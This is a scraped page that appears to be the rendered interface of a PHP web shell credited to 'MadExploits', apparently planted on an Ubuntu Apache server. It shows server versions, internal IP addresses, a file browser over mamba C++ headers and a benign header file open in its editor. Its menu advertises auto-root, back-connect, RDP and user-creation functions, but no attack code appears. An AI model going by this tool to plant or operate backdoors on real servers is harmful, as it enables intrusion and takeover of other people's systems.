Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
miniconda3 /
python /
include /
mamba /
util /
[ HOME SHELL ]
Name
Size
Permission
Action
build.hpp
838
B
-rw-rw-r--
cast.hpp
3.46
KB
-rw-rw-r--
compare.hpp
2.06
KB
-rw-rw-r--
deprecation.hpp
612
B
-rw-rw-r--
flat_binary_tree.hpp
7.56
KB
-rw-rw-r--
flat_bool_expr_tree.hpp
16.24
KB
-rw-rw-r--
flat_set.hpp
10.72
KB
-rw-rw-r--
functional.hpp
770
B
-rw-rw-r--
graph.hpp
23.48
KB
-rw-rw-r--
iterator.hpp
13.6
KB
-rw-rw-r--
path_manip.hpp
1.21
KB
-rw-rw-r--
string.hpp
23.76
KB
-rw-rw-r--
type_traits.hpp
1.45
KB
-rw-rw-r--
url.hpp
5.87
KB
-rw-rw-r--
url_manip.hpp
4.41
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : type_traits.hpp
// Copyright (c) 2023, QuantStack and Mamba Contributors // // Distributed under the terms of the BSD 3-Clause License. // // The full license is in the file LICENSE, distributed with this software. #ifndef MAMBA_UTIL_TYPE_TRAITS_HPP #define MAMBA_UTIL_TYPE_TRAITS_HPP #include <iosfwd> #include <type_traits> namespace mamba::util { namespace detail { /** * Simple detection idiom from N4502 proposal. * * Primary template handles all types not supporting the operation. * * @see https://www.open-std.org/jtc1/sc22/wg21/docs/papers/2015/n4502.pdf */ template <typename, template <typename> typename, typename = std::void_t<>> struct detect : std::false_type { }; /** * Specialization recognizes/validates only types supporting the archetype. */ template <typename T, template <typename> typename Op> struct detect<T, Op, std::void_t<Op<T>>> : std::true_type { }; template <typename L, typename R> using left_shift_operator_t = decltype(std::declval<L>() << std::declval<R>()); template <typename T> using ostreamable_t = left_shift_operator_t<std::ostream&, T>; } template <typename T> using is_ostreamable = detail::detect<std::add_const_t<T>, detail::ostreamable_t>; template <typename T> inline constexpr bool is_ostreamable_v = is_ostreamable<T>::value; } #endif
Close